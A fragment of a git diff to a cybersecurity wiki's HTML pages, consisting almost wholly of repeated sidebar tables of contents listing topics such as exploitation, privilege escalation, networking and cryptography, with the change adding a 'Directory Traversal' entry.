        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -360,22 +360,6 @@

Quiet

- - diff --git a/docs/Networking/Protocols/WLAN (IEEE 802.11)/WiFi Protected Access (WPA).html b/docs/Networking/Protocols/WLAN (IEEE 802.11)/WiFi Protected Access (WPA).html index 77ac0fdb..f0ceae69 100644 --- a/docs/Networking/Protocols/WLAN (IEEE 802.11)/WiFi Protected Access (WPA).html +++ b/docs/Networking/Protocols/WLAN (IEEE 802.11)/WiFi Protected Access (WPA).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -183,22 +183,6 @@

Introduction - - diff --git a/docs/Networking/Protocols/WLAN (IEEE 802.11)/index.html b/docs/Networking/Protocols/WLAN (IEEE 802.11)/index.html index 277168f4..82422d80 100644 --- a/docs/Networking/Protocols/WLAN (IEEE 802.11)/index.html +++ b/docs/Networking/Protocols/WLAN (IEEE 802.11)/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
